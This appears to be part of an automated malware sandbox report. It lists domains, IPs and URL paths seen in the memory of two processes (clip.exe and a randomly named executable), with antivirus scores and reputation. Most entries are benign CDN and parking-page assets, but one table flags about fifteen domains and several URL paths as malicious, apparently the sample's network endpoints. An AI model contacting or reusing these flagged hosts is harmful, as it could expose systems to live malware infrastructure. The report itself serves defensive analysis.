https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Virustotal |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzp | 0% | Avira URL Cloud | safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://static.loopia.se/responsive/styles/reset.css | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | 0% | Avira URL Cloud | safe
http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | 0% | Avira URL Cloud | safe
https://static.loopia.se/responsive/images/iOS-57.png | 0% | Avira URL Cloud | safe
https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif | 0% | Avira URL Cloud | safe
http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | 0% | Avira URL Cloud | safe
http://www.Bfiworkerscomp.com | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sandranoll.com | 213.145.228.16 | true | true | | unknown
www.dmtxwuatbz.cc | 172.67.210.102 | true | true | | unknown
www.xn--matfrmn-jxa4m.se | 194.9.94.85 | true | true | | unknown
www.catherineviskadi.com | 217.160.0.106 | true | true | | unknown
www.anuts.top | 23.251.54.212 | true | true | | unknown
www.bfiworkerscomp.com | 208.91.197.27 | true | true | | unknown
parkingpage.namecheap.com | 91.195.240.19 | true | true | | unknown
www.telwisey.info | 199.192.19.19 | true | true | | unknown
www.hprlz.cz | 5.44.111.162 | true | true | | unknown
www.xn--fhq1c541j0zr.com | 43.252.167.188 | true | true | | unknown
www.fourgrouw.cfd | unknown | unknown | true | | unknown
www.hatercoin.online | unknown | unknown | true | | unknown
www.tinmapco.com | unknown | unknown | true | | unknown
www.gipsytroya.com | unknown | unknown | true | | unknown
www.helpers-lion.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.xn--fhq1c541j0zr.com/rm91/ | true | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/ | true | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://www.dmtxwuatbz.cc/lfkn/ | true | Avira URL Cloud: safe | unknown
http://www.sandranoll.com/aroo/ | true | Avira URL Cloud: malware | unknown
http://www.gipsytroya.com/tf44/ | true | 7% (Virustotal); Avira URL Cloud: malware | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/ | true | 0% (Virustotal); Avira URL Cloud: malware | unknown
http://www.telwisey.info/ei85/ | true | Avira URL Cloud: safe | unknown
http://www.catherineviskadi.com/qe66/ | true | Avira URL Cloud: safe | unknown
http://www.anuts.top/li0t/ | true | Avira URL Cloud: safe | unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabclip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://dts.gnpge.comNpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://duckduckgo.com/ac/?q=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/pics/29590/bg1.png)clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://cdn.consentmanager.netclip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssclip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://static.loopia.se/responsive/images/iOS-72.pngclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.domaintechnik.at/data/gfx/dt_logo_parking.pngclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://static.loopia.se/shared/logo/logo-loopia-white.svgclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
| Name | Source | Malicious | Antivirus Detection | Reputation |
| https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png | clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg | clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/pics/28903/search.png) | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/pics/28905/arrrow.png) | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://delivery.consentmanager.net | clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://static.loopia.se/shared/style/2022-extra-pages.css | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://static.loopia.se/responsive/images/iOS-114.png | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| https://www.google.com/images/branding/product/ico/googleg_lodp.ico | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2 | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzp | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.ecosia.org/newtab/ | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://static.loopia.se/responsive/styles/reset.css | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.Bfiworkerscomp.com | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://ac.ecosia.org/autocomplete?q= | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://static.loopia.se/responsive/images/iOS-57.png | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif | clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js | clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.dmtxwuatbz.cc | NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/Buy_Mutual_Funds.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
